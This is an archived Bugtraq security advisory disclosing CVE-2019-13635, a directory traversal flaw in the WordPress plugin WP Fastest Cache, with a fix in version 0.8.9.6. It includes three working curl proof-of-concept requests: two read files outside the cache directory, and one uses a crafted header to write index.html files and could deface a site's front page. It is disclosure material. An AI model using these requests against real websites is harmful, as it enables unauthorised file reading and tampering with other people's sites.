lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 28 Jul 2019 10:37:56 +0200
From: Imre Rad <radimre83@...il.com>
To: bugtraq@...urityfocus.com
Subject: CVE-2019-13635: Directory traversal in WP Fastest Cache 0.8.9.5 and below

WP Fastest Cache is a Wordpress plugin that creates static html files
from the dynamic WordPress blog in order to speed up operation.

Version 0.8.9.5 and below of the plugin was identified being
vulnerable to directory traversal attacks.

The first two are Windows only, the 3rd one is generic. The Windows
specific ones were tested on WampServer (so with Apache's Httpd).

#1:
The impact is reading files outside of the cache directory. The
attacker has control over the directory only, the file is selected as
the first hit of the scandir results in descending order.


curl --path-as-is http://vulnerable-host.tld/wpfc-minified/..\..\..\/stuff.php

<?php
/**
 * XML-RPC protocol support for WordPress
 *
 * @package WordPress
 */
...

#2:
The cacheFilePath construction logic in cache.php can be abused to
mount a similar attack as vuln #1 and read index.html files outside
the cache directory:

curl --path-as-is http://vulnerable-host.tld/..\..\..\/whatever.html\/..
some html content outside the cache directory
<!-- via php -->


#3:
If the Google Translate plugin is active on the victim system then it
is also possible to create index.html files outside the cache
directory:

curl -v --header "X-GT-LANG: ../../../.."
http://vulnerable-host.tld/some-article/

In configurations where the html extension has higher precedence over
php in the webserver's DirectoryIndex configuration, this could
actually change the front page of the victim website.


Remediation: update to plugin version 0.8.9.6

Imre

Powered by blists - more mailing lists